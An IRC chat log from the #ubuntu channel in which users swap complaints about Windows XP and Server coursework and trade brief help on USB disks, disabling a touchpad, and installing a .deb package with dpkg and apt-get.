epodOk, I have one last fun issue to fix! How do I get my USB hard disk to automagically register when I plug it in?11:53
GnuHippyand how to stick in your XP cd when you have to reformat every week11:54
|trey|aitrus, rather a lot actually... like RIS and DNS and DHCP and well, just about a million clicks  :/11:54
|trey|GnuHippy, umm, working with Server 2k and 2k3   :/11:54
GnuHippysame thing11:54
epodI hate XP.  I fix windows systems all day.  The sheer amount of spyware people get astounds me11:54
=== Keybuk [scott@descent.netsplit.com] has joined #ubuntu
|trey|GnuHippy, merging of AD between those is a pain *nods*11:55
GnuHippylearn to use your ASR console11:55
GnuHippyyou'll need it11:55
|trey|GnuHippy, ASR?11:55
GnuHippyautomated system recovery11:55
|trey|GnuHippy, hahah11:55
HrdwrBoBwhat's what asr is :)11:55
epodpfft, just reinstall :D11:56
linux_mafia|trey|, any nix on your course?11:56
|trey|I dunno, I haven't hated the server products as much as I thought I would... but yeah...11:56
epodArgh, I want to turn off my stupid touchpad.11:56
|trey|linux_mafia, I already took the Linux classes... averaged a 97  :)11:56
GnuHippycomment out you synaptic driver epod11:56
linux_mafia|trey|, this at uni?11:57
epodGnuHippy, Yeah, though I'd kind of rather figure out a way to do it on the fly, since I sometimes use it. Hm.11:57
|trey|linux_mafia, yeah... about to get my AAS  :)11:57
=== kensai [~kensai@sanjuan-196-42-14-85.coqui.net] has joined #ubuntu
mirak_|trey|, what uni?.....and what  is AAS?11:57
zzzzzWhy wont ubuntu let me install libgnutls11-dev_1.0.16-9_i386.deb ?11:58
|trey|Assosiates of Applied Science... Collins College's Network Administration course...11:58
|trey|zzzzz, no idea, what does it complain about?11:58
zzzzzThere was an error launching the application.11:58
|trey|zzzzz, what application?11:58
|trey|zzzzz, dpkg -i it11:58
|trey|zzzzz, apt-get install any_deps_it_complains_about11:59
mirak_|trey|, im a newb....what does "dpkg -i" do.......wand when would i use it?11:59
|trey|mirak, install's .deb's  :)11:59
zzzzzah... ill play around with this12:00

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